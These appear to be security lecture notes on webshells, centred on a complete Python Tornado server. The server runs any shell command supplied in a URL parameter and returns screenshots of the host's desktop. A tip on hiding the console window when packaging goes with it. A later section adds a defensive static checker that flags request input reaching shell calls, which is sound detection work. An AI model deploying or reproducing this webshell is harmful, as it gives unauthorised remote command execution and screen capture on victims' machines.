T3SEC - Lecture 13: webshell

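webshell: a tool for screenshots and remote control

Technical breakdown:

  • webapp: web application
  • http:80/https:443/ws:80/wss:443
    • Communication protocols:
    • http(https)/tcp/udp/ws(wss)
  • cmd/shell, etc.
  • html/css/js, etc.
  • python/asp/php/jsp, etc.
  • binary data, etc.
  • flow control, etc.

webshell:

  • urlshell
  • view shell

When packaging, adding -m at the end hides the command line.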

```python
# python webshell
# Steps:
# 1: build an HTTP server
# 2: open a dedicated port (HTTP 80 / custom port)
# 3: build a view (MVC) -> app
# 4: execute shell commands + capture the remote desktop

# Environment: tornado pyautogui os

from tornado.web import RequestHandler, Application
from tornado.ioloop import IOLoop
from tornado.options import options, parse_command_line, define
from tornado.httpserver import HTTPServer
import platform
import os
import pyautogui


if platform.system() == 'Windows':
    import asyncio
    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())

define('port', default=14444, help='这是http协议的通信端口')

# View class (page)
class index(RequestHandler):
    # post / get
    def get(self):
        # Define and read the URL parameter: http://localhost:14444/?wd=
        cmd = self.get_query_argument("wd", '')
        if cmd == 'screenshot':
            # Take a screenshot
            img = pyautogui.screenshot()
            img.save('screenshot.jpg')
            # Return the image as binary; the file is a JPEG, so label it as one
            with open('screenshot.jpg', 'rb') as pic:
                pics = pic.read()
            self.set_header("Content-Type", "image/jpeg")
            self.write(pics)
        else:
            rs = os.popen(cmd, 'r')
            self.write(rs.read())

# Application
def makeapp():
    return Application([(r'/', index)])

if __name__ == '__main__':
    parse_command_line()
    app = makeapp()
    # Mount: deploy the application into the HTTP server
    server = HTTPServer(app)
    server.bind(options.port)
    server.start()
    # Start the event loop and listen
    IOLoop.current().start()
```
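An added example, not code from the original post: a static check a defender can run over Python sources to flag the pattern the handler above relies on, where a request parameter reaches a shell call. `SAMPLE` is constructed input, the names `SOURCES`, `SINKS` and `find_request_to_shell` are illustrative, and only direct flows inside one function are tracked.

```python
import ast

# Tornado RequestHandler accessors that return attacker-controlled input.
SOURCES = {"get_query_argument", "get_argument", "get_body_argument"}
# Standard-library calls that pass a string to the OS shell.
SINKS = {("os", "popen"), ("os", "system"), ("subprocess", "getoutput")}

# Constructed sample: one handler shaped like the lecture's, one benign.
SAMPLE = '''
import os
from tornado.web import RequestHandler

class Index(RequestHandler):
    def get(self):
        cmd = self.get_query_argument("wd", "")
        self.write(os.popen(cmd, "r").read())

class Health(RequestHandler):
    def get(self):
        self.write(os.popen("uptime").read())
'''

def _call_name(call):
    """Return (base, attr) for calls written as base.attr(...)."""
    f = call.func
    if isinstance(f, ast.Attribute):
        return (f.value.id if isinstance(f.value, ast.Name) else None, f.attr)
    return (None, None)

def _is_source(node):
    return isinstance(node, ast.Call) and _call_name(node)[1] in SOURCES

def find_request_to_shell(source):
    """List (function, line, sink) where request input reaches a shell call."""
    findings = []
    for fn in (n for n in ast.walk(ast.parse(source)) if isinstance(n, ast.FunctionDef)):
        # Pass 1: local names assigned directly from a request accessor.
        tainted = {t.id for n in ast.walk(fn) if isinstance(n, ast.Assign) and _is_source(n.value)
                   for t in n.targets if isinstance(t, ast.Name)}
        # Pass 2: shell calls whose arguments use a tainted name or a source call.
        for call in (n for n in ast.walk(fn) if isinstance(n, ast.Call)):
            if _call_name(call) not in SINKS:
                continue
            used = [n for a in call.args for n in ast.walk(a)]
            if any(_is_source(n) or (isinstance(n, ast.Name) and n.id in tainted) for n in used):
                findings.append((fn.name, call.lineno, ".".join(_call_name(call))))
    return findings

if __name__ == "__main__":
    for name, line, sink in find_request_to_shell(SAMPLE):
        print(f"line {line}: {sink}() in {name}() receives request input")
```

The benign `Health` handler is not reported because its shell call takes a constant string rather than request input.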

Q.E.D.